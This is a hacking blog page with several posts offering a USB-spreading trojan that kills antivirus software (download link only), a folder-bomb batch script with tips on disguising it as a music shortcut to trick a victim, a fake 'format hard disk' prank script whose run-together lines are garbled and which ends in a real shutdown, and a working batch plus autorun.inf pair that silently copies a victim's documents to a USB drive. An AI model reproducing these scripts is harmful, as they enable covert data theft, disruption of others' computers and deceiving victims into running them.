Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

3 sec USB spreading virus - Not Detected

Posted by Junaid July 19, 2010



Plug your USB into your victims computer, wait 3 seconds then BAM!! INFECTED!!

FEATURES:
1. Detected on ONLY ONE anti-virus (BitDefender) as "Gen:Trojan.TaskDisabler.jm0@a8ePtBni"
2. Disables task manager
3. Blocks mouse input
4. Blocks keyboard input
5. Auto-run enabled
6. Kills ScreenSaver
7. Deletes anti-viruses
8. Kills anti-virus processes
9. Kills tasklist, taskeng, taskmgr
10. Deletes cursors
11. Blocks google and other sites
12. Kills explorer
13. Disable form unloads
14. Replace GUI interface

Author: Rodkzf
Full Virus Name: Xodezo aka Gen:Trojan.TaskDisabler.jm0@a8ePtBni
Copyright: © Copyright 2010 Rodkzf Software. All rights reserved.
Version: Alpha One
Visibility: 1/20 (5%)
No. of Features: 14
Time to infect: 3 Seconds
Auto-infect: Yes
Tested: 3 Times (69.4% Stable)
Source Type: Closed
Item Size: 29.07KB
Infect Type: Removable Devices

Download Link



Make over 1,000 folders in few seconds
Here you will learn a simple prank that will make an unlimited amount of folders in any place you want.

Step 1
Open notepad and type:

@echo off
:top
md %random%
goto top

@echo off makes it so that it appears to be a blank screen but actually it’s making hundreds of folder.

md %random% is command that creating folders with random names.

goto top – return to label :top , infinite loop

Step 2
Save it as 1000folders.bat
After that you will get icon that contain some type of wheels in it…
People probably not going to click on an icon that looks like that so to make it better (funnier and easier to prank people with) make a short-cut to it

Step 3
Right click on icon and click Create Shortcut

Step 4

Right click on shortcut and click properties, then click on Change Icon and rename icon
(Better if you changed the icon to a music icon)

tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized

something’s wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…

Virus - Formating whole HDD

Posted by Junaid



The following coding is a type of virus which will delete the whole data stored in the Hard Disk...
Better not to try on your own computer...

Copy this coding and paste it in notepad. Save it with any name with extension .bat
The .bat is must or it'll not working

@echo offcolor 0f
REM: This and the following commands won't be shown on the console.
REM: Now the console's color is green text on black screen. Scary!echo Deleting Critical System Files...
REM: Everything that starts with "echo" is printed at the screen.
REM: It is _not_ really done!echo del *.*ping -n 4 127.0.0.1>nul
REM: Unfortunately there is no command to stop the programm for a few seconds.
REM: But this would be cool, because the user needs time to read the output and
REM: it must look like the computer is working on the things we "echo"'d above.
REM: So what the above command does is: Sending four "pings" at itself.
REM: Each ping lasts one second. So it's the best way to wait for four seconds.
REM: The output of ping is redirected to nowhere (>nul) so it isn't shown anywhere echo Deletion Successfulping -n 2 127.0.0.1>nul
REM: You can set the number of pings by changing the number behind the "-n"echo:
REM: "Echo:" makes an empty line. (Like a break)
echo:
echo Deleting Root Partition...
ping -n 2 127.0.0.1>nul
echo del %SYSTEMROOT%ping -n 4 127.0.0.1>nul
echo Deletion Successfulping -n 2 127.0.0.1>nul
echo:
echo:
echo WARNING: Trojan File download Started
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\
ping -n 1 127.0.0.1>nul
echo mkdir h4xping -n 3 127.0.0.1>nul
echo Trojan virus "juggarnaut" download complete
echo:
echo:
echo Windows Vista ROM: /deleted
ping -n 3 127.0.0.1>nulecho start hax.exeping -n 3 127.0.0.1>nul
echo SYNtax ERROR: all files corrupt
echo:
echo:
ping -n 2 127.0.0.1>nul
echo Disabling Windows Firewall...
ping -n 2 127.0.0.1>nul
echo Total system MALfunction
ping -n 2 127.0.0.1>nul
echo Allowing virus to boot from startup...
ping -n 2 127.0.0.1>nul
echo:
echo:
echo Deleting C: Hard drive/ documens / castlerp
ping -n 2 127.0.0.1>nul
shutdown -s -t 10 -c "FATAL ERROR: system malfunction in process.



Here is something illegal but only for educational propose. This only demonstrates how you can copy files from your friend’s PC as soon as you plug in your flash drive or any removable storage media.
How you can do this from batch file with the help of autorun.inf file?


When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration batch file is copying only the files and folders in My Documents.
Here goes the batch code:
@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit


:ERROR
exit
What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.
Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.
This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.
Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.
Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.
Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.
This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.
[autorun]
Open=Filename.bat
Action=File Copier
The above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Subscribe To Guide 29

Enter your email address:

Delivered by FeedBurner

Join On Social Networks
  • Subscribe to RSS feed
  • Become Fan On FB
  • Follow Updates on Twitter
  • Be A Friend on Digg
  • Follow On SU

Become A Fan

Tags